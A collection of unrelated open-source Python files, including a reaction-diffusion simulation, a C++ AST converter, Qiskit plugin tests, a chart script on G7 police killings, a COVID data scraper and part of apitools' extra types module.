samples/gray-scott/gs_jit.py | Ryoich/python_zero | 203 | 12610205 | <reponame>Ryoich/python_zero<gh_stars>100-1000
import matplotlib.pyplot as plt
from numba import jit
import numpy as np
# python gs_jit.py 1.91s user 0.16s system 119% cpu 1.736 total
@jit
def laplacian(ix, iy, s):
ts = 0.0
ts += s[ix-1, iy]
ts += s[ix+1, iy]
ts += s[ix, iy-1]
ts += s[ix, iy+1]
ts -= 4.0*s[ix, iy]
return ts
@jit
def calc(u, v, u2, v2):
(L, _) = u.shape
dt = 0.2
F = 0.04
k = 0.06075
lu = np.zeros((L, L))
lv = np.zeros((L, L))
for ix in range(1, L-1):
for iy in range(1, L-1):
lu[ix, iy] = 0.1 * laplacian(ix, iy, u)
lv[ix, iy] = 0.05 * laplacian(ix, iy, v)
cu = -v*v*u + F*(1.0 - u)
cv = v*v*u - (F+k)*v
u2[:] = u + (lu+cu) * dt
v2[:] = v + (lv+cv) * dt
def main():
L = 64
u = np.zeros((L, L))
u2 = np.zeros((L, L))
v = np.zeros((L, L))
v2 = np.zeros((L, L))
h = L//2
u[h-6:h+6, h-6:h+6] = 0.9
v[h-3:h+3, h-3:h+3] = 0.7
for i in range(10000):
if i % 2 == 0:
calc(u, v, u2, v2)
else:
calc(u2, v2, u, v)
return v
plt.imshow(main())
plt.savefig("gs.png")
|
transpyle/cpp/ast_generalizer.py | EraYaN/transpyle | 107 | 12610212 | """Generalizing C++ AST."""
import logging
import pprint
# import re
import typing as t
import xml.etree.ElementTree as ET
import horast
from static_typing.ast_manipulation import RecursiveAstTransformer
import typed_ast.ast3 as typed_ast3
from ..general import XmlAstGeneralizer
from ..general.exc import ContinueIteration, AstGeneralizationError
from .definitions import CPP_PYTHON_TYPE_PAIRS, CPP_PYTHON_CLASS_PAIRS, CPP_STL_CLASSES
NAMESPACE_NODES = {'Namespace'}
TYPE_NODES = {'ArrayType', 'CvQualifiedType', 'ElaboratedType', 'FunctionType',
'FundamentalType', 'MethodType', 'OffsetType', 'PointerType', 'ReferenceType',
'Struct', 'Class', 'Typedef'}
RESOLVED_TYPE_NODES = ['FundamentalType', 'PointerType', 'ElaboratedType', 'Struct', 'Class']
IGNORED_NODES = {'File'} | NAMESPACE_NODES | TYPE_NODES
_LOG = logging.getLogger(__name__)
def make_pointer(base_type: typed_ast3.AST):
return typed_ast3.Subscript(
value=typed_ast3.Name(id='Pointer', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(base_type), ctx=typed_ast3.Load())
def make_const(base_type: typed_ast3.AST):
return typed_ast3.Subscript(
value=typed_ast3.Name(id='Const', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(base_type), ctx=typed_ast3.Load())
class XmlAstGeneralizationError(AstGeneralizationError):
def __init__(self, generalizer: XmlAstGeneralizer, xml_node: ET.Element):
assert isinstance(generalizer, XmlAstGeneralizer), type(generalizer)
assert isinstance(xml_node, ET.Element), type(xml_node)
self.generalizer = generalizer
self.xml_node = xml_node
super().__init__(ET.tostring(xml_node).decode().rstrip())
def diagnose(function):
def wrapper(*args, **kwargs):
try:
return function(*args, **kwargs)
except AstGeneralizationError as error:
raise XmlAstGeneralizationError(*args, **kwargs) from error
except KeyError as error:
raise XmlAstGeneralizationError(*args, **kwargs) from error
return wrapper
class CastXMLTypeFinder(XmlAstGeneralizer):
"""Produce Python type hierarchy for C++ AST generated with CastXML."""
def __init__(self, scope=None):
super().__init__(scope)
assert scope is not None, \
'scope={\'path\': pathlib.Path(...)} has to be provided for C++ generalizer'
self.file_id = None
self._new_relevant_types = None
self.initialize()
def initialize(self):
self.file_id = None
self.namespaces = {}
self.all_types = {}
self.relevant_types = {}
self.resolved_types = {}
def _determine_file_id(self, root_node: ET.Element) -> str:
file_nodes = self.get_all(root_node, './File')
relevant_file_nodes = []
parsed_filename = str(self.scope['path'])
for file_node in file_nodes:
name = file_node.attrib['name']
if name != parsed_filename:
continue
relevant_file_nodes.append(file_node)
assert len(relevant_file_nodes) == 1, relevant_file_nodes
file_node = relevant_file_nodes[0]
return file_node.attrib['id']
def is_relevant(self, node: ET.Element):
try:
return node.attrib['file'] == self.file_id
except KeyError:
return False
def _CastXML(self, node: ET.Element): # pylint: disable=invalid-name
self.file_id = self._determine_file_id(node)
self.find_types(node)
while self._new_relevant_types:
_LOG.debug('there are %i new relevant types', len(self._new_relevant_types))
self.relevant_types.update(self._new_relevant_types)
self._new_relevant_types = {}
new_resolved_types = {}
for id_, node_ in self.relevant_types.items():
if id_ in self.resolved_types:
continue
new_resolved_types[id_] = self.transform_one(node_)
_LOG.debug('resolved %s into %s', ET.tostring(node_).decode().rstrip(),
horast.unparse(new_resolved_types[id_]))
self.resolved_types.update(new_resolved_types)
self._fix_resolved_types(self.resolved_types)
_LOG.info('type resolution complete: %s', pprint.pformat(
{_: horast.unparse(type_).strip() for _, type_ in self.resolved_types.items()}))
def find_types(self, root_node: ET.Element) -> t.Tuple[dict, dict]:
self._new_relevant_types = {}
self.transform_all_subnodes(root_node, ignored={'File'} | TYPE_NODES)
for type_ in TYPE_NODES:
for node in self.get_all(root_node, './{}'.format(type_), require_results=False):
id_ = node.attrib['id']
self.all_types[node.attrib['id']] = node
if id_ not in self._new_relevant_types:
continue
self._new_relevant_types[node.attrib['id']] = node
assert all(v is not None for v in self._new_relevant_types.values()), \
self._new_relevant_types
_LOG.info('found %i relevant types (out of %i) in "%s"',
len(self._new_relevant_types), len(self.all_types), self.scope['path'])
def _fix_resolved_types(self, resolved_types: dict) -> None:
resolver = CastXMLTypeResolver(resolved_types=resolved_types)
resolver.modified = True
while resolver.modified:
resolver.modified = False
for _, type_ in resolved_types.items():
resolver.visit(type_)
if resolver.unresolved_types:
_LOG.error('after type resolution for "%s", %i types remain unresolved',
self.scope['path'], len(resolver.unresolved_types))
_LOG.debug('the following types remain unresolved:\n%s',
pprint.pformat(resolver.unresolved_types))
raise NotImplementedError(
'could not resolve some types: {}'.format(resolver.unresolved_types))
def default(self, node: ET.Element):
"""Ignore irrelevant nodes, raise error otherwise."""
if not self.is_relevant(node):
# _LOG.warning('no file for %s', ET.tostring(node).decode().rstrip())
# self.no_transform(node)
raise ContinueIteration()
self.no_transform(node)
_Unimplemented = default
_Field = default
_Constructor = default
_Destructor = default
_Method = default
_OperatorMethod = default
_Variable = default
_Enumeration = default
_Union = default
_OperatorFunction = default
_Converter = default
def _Function(self, node: ET.Element): # pylint: disable=invalid-name
if not self.is_relevant(node):
raise ContinueIteration()
self.transform_all_subnodes(node)
self._new_relevant_types[node.attrib['returns']] = None
def _Argument(self, node: ET.Element): # pylint: disable=invalid-name
self._new_relevant_types[node.attrib['type']] = None
@diagnose
def _Namespace(self, node: ET.Element): # pylint: disable=invalid-name
id_ = node.attrib['id']
if 'name' not in node.attrib:
_LOG.info('ignoring namespace without name')
return
self.namespaces[id_] = node.attrib['name']
def _FundamentalType(self, node: ET.Element): # pylint: disable=invalid-name
name = node.attrib['name']
return typed_ast3.parse(CPP_PYTHON_TYPE_PAIRS[name], mode='eval').body
def _PointerType(self, node: ET.Element): # pylint: disable=invalid-name
type_id = node.attrib['type']
is_const = type_id.endswith('c')
if is_const:
type_id = type_id[:-1]
assert type_id in self.all_types
if type_id not in self.relevant_types and type_id not in self._new_relevant_types:
self._new_relevant_types[type_id] = self.all_types[type_id]
_LOG.debug('type makred as relevant through a pointer: %s',
ET.tostring(self.all_types[type_id]).decode().rstrip())
type_info = make_pointer(typed_ast3.Str(type_id, ''))
if is_const:
type_info = make_const(type_info)
return type_info
'''
def _ElaboratedType(self, node: ET.Element): # pylint: disable=invalid-name
id_ = node.attrib['id']
type_ = node.attrib['type']
try:
base_type = self.fundamental_types[type_]
except KeyError:
# _LOG.debug()
base_type = typed_ast3.Str(type_, '')
type_info = typed_ast3.Subscript(
value=typed_ast3.Name(id='Elaborated', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(base_type), ctx=typed_ast3.Load())
return (id_, type_info)
def _Struct(self, node: ET.Element): # pylint: disable=invalid-name
context = node.attrib['context']
if context not in self._namespaces or self._namespaces[context].id != 'std':
raise ContinueIteration()
struct_name = node.attrib['name']
full_name = '{}::{}'.format(context, struct_name)
if struct_name.startswith('hash<') and struct_name.endswith('>'):
raise ContinueIteration()
if full_name in CPP_PYTHON_CLASS_PAIRS:
id_ = node.attrib['id']
return (id_, typed_ast3.Name(id=CPP_PYTHON_CLASS_PAIRS[full_name], ctx=typed_ast3.Load()))
if struct_name.startswith('__'):
raise ContinueIteration()
self.no_transform(node)
'''
def _Class(self, node: ET.Element): # pylint: disable=invalid-name
context = node.attrib['context']
assert context in self.namespaces, context
cls_name = node.attrib['name']
if '<' in cls_name:
_LOG.warning('processing template class %s', cls_name)
assert '>' in cls_name
cls_name, _, rest = cls_name.partition('<')
rest = rest[:-1]
generic_args = [_.strip() for _ in rest.split(',')]
_LOG.warning('found generic args: %s', generic_args)
full_name = '{}::{}'.format(self.namespaces[context], cls_name)
is_stl_class = full_name in CPP_STL_CLASSES and generic_args
value_type = None
body = []
for member_id in node.attrib['members'].split():
if not is_stl_class:
# TODO: handle non-STL classes too
break
if member_id not in self.all_types:
continue
member_type = self.all_types[member_id]
if member_type.tag == 'Typedef' and member_type.attrib['name'] == 'value_type':
referenced_id = member_type.attrib['type']
assert referenced_id in self.all_types
if referenced_id not in self.relevant_types \
and referenced_id not in self._new_relevant_types:
self._new_relevant_types[referenced_id] = self.all_types[referenced_id]
_LOG.debug('type marked as relevant due to being container value type %s',
ET.tostring(self.all_types[referenced_id]).decode().rstrip())
body.append(typed_ast3.Expr(typed_ast3.Str(referenced_id, '')))
value_type = referenced_id
'''
if member_id not in self.relevant_types and member_id not in self._new_relevant_types:
self._new_relevant_types[member_id] = member_type
_LOG.warning('marked %s as relevant type',
ET.tostring(member_type).decode().rstrip())
body.append(typed_ast3.Expr(typed_ast3.Str(member_id, '')))
'''
base_class = typed_ast3.parse(CPP_PYTHON_CLASS_PAIRS[full_name], mode='eval').body
if is_stl_class:
assert value_type is not None
base_class = typed_ast3.Subscript(
value=base_class,
slice=typed_ast3.Index(typed_ast3.Str(value_type, '')), ctx=typed_ast3.Load())
return base_class
def _Base(self, node: ET.Element):
return node.attrib['type']
class CastXMLTypeResolver(RecursiveAstTransformer[typed_ast3]):
def __init__(self, *args, resolved_types, **kwargs):
super().__init__(*args, **kwargs)
self.resolved_types = resolved_types
self.unresolved_types = set()
self.modified = False
def visit_node(self, node):
if not isinstance(node, typed_ast3.Str):
return node
try:
resolved_type = self.resolved_types[node.s]
except KeyError:
self.unresolved_types.add(node.s)
_LOG.debug('cannot currently resolve %s', node.s)
return node
if node.s in self.unresolved_types:
self.unresolved_types.remove(node.s)
_LOG.debug('resolved %s into %s', node.s, typed_ast3.dump(resolved_type))
self.modified = True
return resolved_type
class CppAstGeneralizer(XmlAstGeneralizer):
"""Transform C++ XML AST generated with CastXML into Python AST from typed_ast."""
def __init__(self, scope=None):
super().__init__(scope)
assert scope is not None, \
'scope={"path": pathlib.Path(...)} has to be provided for C++ generalizer'
self.types = CastXMLTypeFinder(self.scope)
def _CastXML(self, node: ET.Element): # pylint: disable=invalid-name
self.types.initialize()
self.types.generalize(node)
body = self.transform_all_subnodes(node, ignored=IGNORED_NODES)
return typed_ast3.Module(body=body, type_ignores=[])
def default(self, node: ET.Element):
"""Ignore irrelevant nodes, raise error otherwise."""
if not self.types.is_relevant(node):
raise ContinueIteration()
self.no_transform(node)
_Field = default
_Constructor = default
_Destructor = default
_Method = default
_OperatorMethod = default
_Variable = default
_Enumeration = default
_Union = default
_OperatorFunction = default
_Converter = default
def _Unimplemented(self, node: ET.Element): # pylint: disable=invalid-name
try:
node_str = node.attrib['kind']
except KeyError:
_LOG.debug('unexpected behavior: %s', ET.tostring(node).decode().rstrip())
try:
node_str = node.attrib['type_class']
except KeyError:
self.no_transform(node)
_LOG.info('the underlying CastXML parser did not parse a %s', node_str)
raise ContinueIteration()
def _Function(self, node: ET.Element): # pylint: disable=invalid-name
if not self.types.is_relevant(node):
raise ContinueIteration()
name = node.attrib['name']
arguments = typed_ast3.arguments(args=self.transform_all_subnodes(node), vararg=None,
kwonlyargs=[], kwarg=None, defaults=[], kw_defaults=[])
body = [typed_ast3.Expr(value=typed_ast3.Ellipsis())]
returns = self.types.resolved_types[node.attrib['returns']]
return typed_ast3.FunctionDef(name=name, args=arguments, body=body, decorator_list=[],
returns=returns)
def _Argument(self, node: ET.Element): # pylint: disable=invalid-name
try:
annotation = self.types.resolved_types[node.attrib['type']]
except KeyError as error:
raise NotImplementedError('cannot generalize the node {}'.format(
ET.tostring(node).decode().rstrip())) from error
assert annotation is not None
return typed_ast3.arg(arg=node.attrib['name'], annotation=annotation)
def _Class(self, node: ET.Element): # pylint: disable=invalid-name
self.default(node)
'''
keywords = [typed_ast3.keyword(
arg='generic_args',
value=typed_ast3.Tuple([typed_ast3.Str(_, '') for _ in generic_args]))]
bases = self.transform_all_subnodes(node)
for base in bases:
assert base in self.all_types
if base not in self.relevant_types and base not in self._new_relevant_types:
self._new_relevant_types[base] = self.all_types[base]
_LOG.warning('marked %s as relevant type',
ET.tostring(self.all_types[base]).decode().rstrip())
if not body:
body = [typed_ast3.Pass()]
return typed_ast3.ClassDef(name=cls_name, bases=bases, keywords=keywords, body=body,
decorator_list=[])
'''
'''
if cls_name.startswith('vector<') and cls_name.endswith('>'):
_LOG.warning('processing class %s', ET.tostring(node).decode().rstrip())
# vector<double,
return (id_, typed_ast3.Subscript(
value=typed_ast3.Attribute(
value=typed_ast3.Name(id='t', ctx=typed_ast3.Load()),
attr='List', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(typed_ast3.Attribute(
value=typed_ast3.Name(id='np', ctx=typed_ast3.Load()),
attr='double', ctx=typed_ast3.Load())), ctx=typed_ast3.Load()))
if re.fullmatch(r'[A-Za-z_]+', cls_name):
return (id_, typed_ast3.Name(id=cls_name, ctx=typed_ast3.Load()))
# import ipdb; ipdb.set_trace()
# return self.default(node)
#
raise ContinueIteration()
# _LOG.error('not really processing class %s', ET.tostring(node).decode().rstrip())
# return (id_, typed_ast3.Str('class_{}'.format(node.attrib['name']), ''))
'''
|
pysrc/gen_chip_list.py | CrackerCat/xed | 1,261 | 12610213 | <filename>pysrc/gen_chip_list.py
#!/usr/bin/env python
# -*- python -*-
#BEGIN_LEGAL
#
#Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
from __future__ import print_function
import sys
import collections
import read_xed_db
import gen_setup
import chipmodel
def die(s):
sys.stdout.write("ERROR: {0}\n".format(s))
sys.exit(1)
def msgb(b,s=''):
sys.stdout.write("[{0}] {1}\n".format(b,s))
def check(chip, xeddb, chipdb, classes):
icount = 0
histo = collections.defaultdict(int)
for inst in xeddb.recs:
if inst.isa_set in chipdb[chip]:
icount = icount + 1
clas = classes[inst.isa_set]
if inst.scalar:
clas = clas + '.sc'
histo[clas] = histo[clas] + 1
return (chip, icount, histo)
def work(args): # main function
msgb("READING XED DB")
(chips, chip_db) = chipmodel.read_database(args.chip_filename)
xeddb = gen_setup.read_db(args)
isasets = set()
for r in xeddb.recs:
isasets.add(r.isa_set)
classes = {}
for i in isasets:
c = 'general'
if 'XOP' in i:
c = 'xop'
elif 'SSE' in i:
c = 'sse'
elif 'AVX512' in i:
c = 'avx512'
elif 'ICL' in i:
c = 'avx512'
elif 'AVX' in i:
c = 'avx'
elif 'FMA' in i:
c = 'avx'
elif 'F16C' in i:
c = 'avx'
elif 'MMX' in i:
c = 'mmx'
classes[i]=c
chip_icount_histo_tup = []
for c in chips:
r = check(c, xeddb, chip_db, classes)
chip_icount_histo_tup.append(r)
groups = [ 'general', 'mmx', 'sse', 'avx', 'avx512' ]
for inst in xeddb.recs:
if classes[inst.isa_set] == 'general' and inst.scalar:
print("GPR SCALAR", inst.iclass)
tlist = []
for s in chip_icount_histo_tup:
t = []
(chip, icount, histo) = s
t.append("{0:20s} {1:4d}".format(chip,icount))
for scalar in ['.sc', '']:
for x in groups:
k = x + scalar
t.append( "{0:7s}:{1:4d}".format( k, histo[k]))
tlist.append((icount, " ".join(t)))
def keyfn(x):
return x[0]
tlist.sort(key=keyfn)
for x,y in tlist:
print(y)
return 0
if __name__ == "__main__":
args = gen_setup.setup("Generate instruction counts per chip")
r = work(args)
sys.exit(r)
|
rpython/rtyper/lltypesystem/llheap.py | jptomo/pypy-lang-scheme | 381 | 12610226 | # only for the LLInterpreter. Don't use directly.
from rpython.rtyper.lltypesystem.lltype import malloc, free, typeOf
from rpython.rtyper.lltypesystem.llmemory import weakref_create, weakref_deref
setfield = setattr
from operator import setitem as setarrayitem
from rpython.rlib.rgc import can_move, collect, add_memory_pressure
def setinterior(toplevelcontainer, inneraddr, INNERTYPE, newvalue,
offsets=None):
assert typeOf(newvalue) == INNERTYPE
# xxx access the address object's ref() directly for performance
inneraddr.ref()[0] = newvalue
from rpython.rtyper.lltypesystem.lltype import cast_ptr_to_int as gc_id
def weakref_create_getlazy(objgetter):
return weakref_create(objgetter())
def shrink_array(p, smallersize):
return False
def thread_run():
pass
def thread_start():
pass
def thread_die():
pass
def pin(obj):
return False
def unpin(obj):
raise AssertionError("pin() always returns False, "
"so unpin() should not be called")
def _is_pinned(obj):
return False
|
scripts/13_random_name_generator.py | Kirklin12/python-scripts | 2,076 | 12610290 | <reponame>Kirklin12/python-scripts
from random import choice
def random_name_generator(first, second, x):
"""
Generates random names.
Arguments:
- list of first names
- list of last names
- number of random names
"""
names = []
for i in range(x):
names.append("{0} {1}".format(choice(first), choice(second)))
return set(names)
first_names = ["Drew", "Mike", "Landon", "Jeremy", "Tyler", "Tom", "Avery"]
last_names = ["Smith", "Jones", "Brighton", "Taylor"]
names = random_name_generator(first_names, last_names, 5)
print('\n'.join(names))
|
test/python/transpiler/aqc/test_aqc_plugin.py | Roshan-Thomas/qiskit-terra | 1,599 | 12610302 | <reponame>Roshan-Thomas/qiskit-terra<filename>test/python/transpiler/aqc/test_aqc_plugin.py
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Tests AQC plugin.
"""
import numpy as np
from qiskit import QuantumCircuit
from qiskit.algorithms.optimizers import SLSQP
from qiskit.converters import dag_to_circuit, circuit_to_dag
from qiskit.quantum_info import Operator
from qiskit.test import QiskitTestCase
from qiskit.transpiler import PassManager
from qiskit.transpiler.passes import UnitarySynthesis
from qiskit.transpiler.synthesis.aqc.aqc_plugin import AQCSynthesisPlugin
class TestAQCSynthesisPlugin(QiskitTestCase):
"""Basic tests of the AQC synthesis plugin."""
def setUp(self):
super().setUp()
self._qc = QuantumCircuit(3)
self._qc.mcx(
[
0,
1,
],
2,
)
self._target_unitary = Operator(self._qc).data
self._seed_config = {"seed": 12345}
def test_aqc_plugin(self):
"""Basic test of the plugin."""
plugin = AQCSynthesisPlugin()
dag = plugin.run(self._target_unitary, config=self._seed_config)
approx_circuit = dag_to_circuit(dag)
approx_unitary = Operator(approx_circuit).data
np.testing.assert_array_almost_equal(self._target_unitary, approx_unitary, 3)
def test_plugin_setup(self):
"""Tests the plugin via unitary synthesis pass"""
transpiler_pass = UnitarySynthesis(
basis_gates=["rx", "ry", "rz", "cx"], method="aqc", plugin_config=self._seed_config
)
dag = circuit_to_dag(self._qc)
dag = transpiler_pass.run(dag)
approx_circuit = dag_to_circuit(dag)
approx_unitary = Operator(approx_circuit).data
np.testing.assert_array_almost_equal(self._target_unitary, approx_unitary, 3)
def test_plugin_configuration(self):
"""Tests plugin with a custom configuration."""
config = {
"network_layout": "sequ",
"connectivity_type": "full",
"depth": 0,
"seed": 12345,
"optimizer": SLSQP(),
}
transpiler_pass = UnitarySynthesis(
basis_gates=["rx", "ry", "rz", "cx"], method="aqc", plugin_config=config
)
dag = circuit_to_dag(self._qc)
dag = transpiler_pass.run(dag)
approx_circuit = dag_to_circuit(dag)
approx_unitary = Operator(approx_circuit).data
np.testing.assert_array_almost_equal(self._target_unitary, approx_unitary, 3)
def test_with_pass_manager(self):
"""Tests the plugin via pass manager"""
qc = QuantumCircuit(3)
qc.unitary(np.eye(8), [0, 1, 2])
aqc = PassManager(
[
UnitarySynthesis(
basis_gates=["u", "cx"], method="aqc", plugin_config=self._seed_config
)
]
).run(qc)
approx_unitary = Operator(aqc).data
np.testing.assert_array_almost_equal(np.eye(8), approx_unitary, 3)
|
mainapp/migrations/0024_auto_20180815_2306.py | sndp487/rescuekerala | 657 | 12610329 | <filename>mainapp/migrations/0024_auto_20180815_2306.py<gh_stars>100-1000
# Generated by Django 2.1 on 2018-08-15 17:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0023_auto_20180815_1848"),
]
operations = [
migrations.AlterField(model_name="districtmanager", name="phone", field=models.CharField(max_length=11),),
]
|
dataviz/politics_g7_police.py | Udzu/pudzu | 119 | 12610334 | from pudzu.charts import *
FONT = calibri
SCALE = 2.25
s = lambda i: round(i * SCALE)
FONTSIZE = s(16)
BIGFONT = s(18)
SMALLFONT = s(14)
SUBTITLEFONT = s(36)
TITLEFONT = s(40)
atlas = pd.read_csv("datasets/countries.csv").split_columns('country', "|").explode('country').set_index("country")
df = pd.read_csv("datasets/g7_policedeaths.csv").set_index("country")
df["policedeaths_pm"] = df["policedeaths_total"] * 1000000 / atlas.loc[df.index].population
# Bar charts
def rlabel(r):
return Image.from_row([
Image.from_text(df.index[r].replace("\\n","\n"), FONT(FONTSIZE), "black", align="center"),
Image.from_url_with_cache(atlas.flag[df.index[r]]).convert("RGBA").resize((s(48*1.5),s(48))).trim(s(1)).pad(s(1), "grey")
], padding=(s(2),0))
def label_if(pred, labeler=lambda c,r,v: format_float(v, 3)): # TODO: automate this bit
return lambda c,r,v: None if not pred(v) else labeler(c,r,v)
df = df.sort_values("guns_ph", ascending=False)
guns = bar_chart(df[["guns_ph"]], s(48), s(400), bg=None, horizontal=True, spacing=s(2), label_font=FONT(FONTSIZE), rlabels=rlabel,
clabels= { BarChartLabelPosition.INSIDE : label_if(artial(op.ge,15)),
BarChartLabelPosition.OUTSIDE : label_if(artial(op.lt,15))},
grid_interval=10, grid_width=s(0.5), ymax=120, ylabel=Image.from_text("privately owned guns per 100 population (2017)", FONT(BIGFONT), padding=s(5)))
df = df.sort_values("homicide_pm", ascending=False)
homicides = bar_chart(df[["homicide_pm"]], s(48), s(400), bg=None, horizontal=True, spacing=s(2), label_font=FONT(FONTSIZE), rlabels=rlabel,
clabels= { BarChartLabelPosition.INSIDE : label_if(artial(op.ge,10), lambda c,r,v: "{:.1f} ({:,} total)".format(v, df.homicide_total[df.index[r]])),
BarChartLabelPosition.OUTSIDE : label_if(artial(op.lt,10), lambda c,r,v: "{:.1f} ({:,} total)".format(v, df.homicide_total[df.index[r]]) + (df.index[r] == "Japan")*" (lower than the US police’s killing rate!)")},
grid_interval=5, grid_width=s(0.5), ymax=50, ylabel=Image.from_text("intentional homicides per million population (2015)", FONT(BIGFONT), padding=s(5)))
df = df.sort_values("policedeaths_pm", ascending=False)
policedeaths = bar_chart(df[["policedeaths_pm"]], s(48), s(950), bg=None, horizontal=True, spacing=s(2), label_font=FONT(FONTSIZE), rlabels=rlabel,
clabels= { BarChartLabelPosition.INSIDE : label_if(artial(op.ge,0.5), lambda c,r,v: "{:.2f} ({:,} total)".format(v, df.policedeaths_total[df.index[r]])),
BarChartLabelPosition.OUTSIDE: label_if(artial(op.lt,0.5), lambda c,r,v: "{:.1g} ({:,} total)".format(v, df.policedeaths_total[df.index[r]])) },
grid_interval=0.25, grid_width=s(1), label_interval=0.5, ymax=3.6, ylabel=Image.from_multitext(["killings by law enforcement officers per million population (2015) ", "(estimates)"], [FONT(BIGFONT), FONT(SMALLFONT)]).pad(s(5),0))
# Put it all together
chart = Image.from_column([policedeaths, Image.from_row([guns, homicides])], padding=s(20))
title = Image.from_column([Image.from_text("Police killing rates in G7 members".upper(), FONT(TITLEFONT, bold=True)), Image.from_text("compared to gun ownership and homicide rates", FONT(SUBTITLEFONT))])
# footer = Image.from_markup(
# "**Police killing estimates** from //The Counted// (US), //A Toutes Les Victimes// (France), //UK Home Office// (UK),\n //Schusswaffeneinsatz.de// (Germany), //Wikipedia// (Canada), //ACAD// (Italy) and additional media reports.\n"
# "**Gun ownership data** from the //IHEID Small Arms Survey (2007)//.\n"
# "**Homicide data** from the //United Nations Office on Drugs and Crime// website.", partial(FONT, FONTSIZE), padding=s(5))
img = Image.from_column([title, chart], padding=s(5), bg="white")
# background = Image.from_url_with_cache("http://trueblueline.net/wp-content/uploads/2015/05/o-POLICE-LIGHTS-facebook.jpg").crop_to_aspect(img.width, img.height).resize(img.size).brighten(0.75)
# img = background.place(img)
#img.place(Image.from_text("/u/Udzu", font("arial", FONTSIZE), fg="black", bg=None, padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/g7_police.png")
|
scrapers/scrape_nw.py | brunis83/covid_19 | 485 | 12610362 | <reponame>brunis83/covid_19
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from bs4 import BeautifulSoup
import scrape_common as sc
import scrape_nw_common as snc
url, soup = snc.get_nw_page()
item = soup.find(text=re.compile('Anzahl F.lle')).find_parent('p')
assert item, f"Could not find title item in {url}"
dd = sc.DayData(canton='NW', url=url)
dd.datetime = sc.find(r'Stand: (\d+\. .* 20\d{2})', item.text)
rows = item.find_next('table').findChildren('tr')
for row in rows:
cols = row.findChildren('td')
item = cols[0].text
if re.match(r'positiv getestete personen.*', item, re.I):
dd.cases = cols[1].text
dd.cases = dd.cases.replace('*', '')
elif re.match(r'derzeit hospitalisiert', item, re.I):
dd.hospitalized = cols[1].text
elif re.match(r'davon auf der intensivstation', item, re.I):
dd.icu = cols[1].text
elif re.match(r'verstorbene personen', item, re.I):
dd.deaths = cols[1].text
elif re.match(r'personen in isolation', item, re.I):
dd.isolated = cols[1].text
elif re.match(r'kontaktpersonen in quarant.ne', item, re.I):
dd.quarantined = cols[1].text
elif re.match(r'Reiser.ckkehrer in quarant.ne', item, re.I):
dd.quarantine_riskareatravel = cols[1].text
is_first = True
if dd:
print(dd)
is_first = False
xls_url = 'http://www.nw.ch/coronastatistik'
xls = sc.xlsdownload(xls_url, silent=True)
rows = sc.parse_xls(xls, header_row=2)
for row in rows:
dd = sc.DayData(canton='NW', url=xls_url)
dd.datetime = row['A'].date().isoformat()
dd.cases = row['Positiv getestete Personen (kumuliert)']
dd.icu = row['Davon auf der Intensivstation']
try:
dd.hospitalized = row['Aktuell hospitalisierte Personen']
except KeyError:
dd.hospitalized = row['Hospitalisierte Personen']
try:
dd.deaths = row['Personen verstorben']
except KeyError:
dd.deaths = row['Verstorbene Personen']
# skip empty rows
if dd.cases is None and dd.icu is None and dd.hospitalized is None and dd.deaths is None:
continue
if not is_first:
print('-' * 10)
is_first = False
print(dd)
|
apitools/base/py/extra_types.py | SJ029626/apitools | 143 | 12610383 | <filename>apitools/base/py/extra_types.py<gh_stars>100-1000
#!/usr/bin/env python
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extra types understood by apitools."""
import datetime
import json
import numbers
import six
from apitools.base.protorpclite import message_types
from apitools.base.protorpclite import messages
from apitools.base.protorpclite import protojson
from apitools.base.py import encoding_helper as encoding
from apitools.base.py import exceptions
from apitools.base.py import util
if six.PY3:
from collections.abc import Iterable
else:
from collections import Iterable
__all__ = [
'DateField',
'DateTimeMessage',
'JsonArray',
'JsonObject',
'JsonValue',
'JsonProtoEncoder',
'JsonProtoDecoder',
]
# pylint:disable=invalid-name
DateTimeMessage = message_types.DateTimeMessage
# pylint:enable=invalid-name
# We insert our own metaclass here to avoid letting ProtoRPC
# register this as the default field type for strings.
# * since ProtoRPC does this via metaclasses, we don't have any
# choice but to use one ourselves
# * since a subclass's metaclass must inherit from its superclass's
# metaclass, we're forced to have this hard-to-read inheritance.
#
# pylint: disable=protected-access
class _FieldMeta(messages._FieldMeta):
def __init__(cls, name, bases, dct): # pylint: disable=no-self-argument
# pylint: disable=super-init-not-called,non-parent-init-called
type.__init__(cls, name, bases, dct)
# pylint: enable=protected-access
class DateField(six.with_metaclass(_FieldMeta, messages.Field)):
"""Field definition for Date values."""
VARIANTS = frozenset([messages.Variant.STRING])
DEFAULT_VARIANT = messages.Variant.STRING
type = datetime.date
def _ValidateJsonValue(json_value):
entries = [(f, json_value.get_assigned_value(f.name))
for f in json_value.all_fields()]
assigned_entries = [(f, value)
for f, value in entries if value is not None]
if len(assigned_entries) != 1:
raise exceptions.InvalidDataError(
'Malformed JsonValue: %s' % json_value)
def _JsonValueToPythonValue(json_value):
"""Convert the given JsonValue to a json string."""
util.Typecheck(json_value, JsonValue)
_ValidateJsonValue(json_value)
if json_value.is_null:
return None
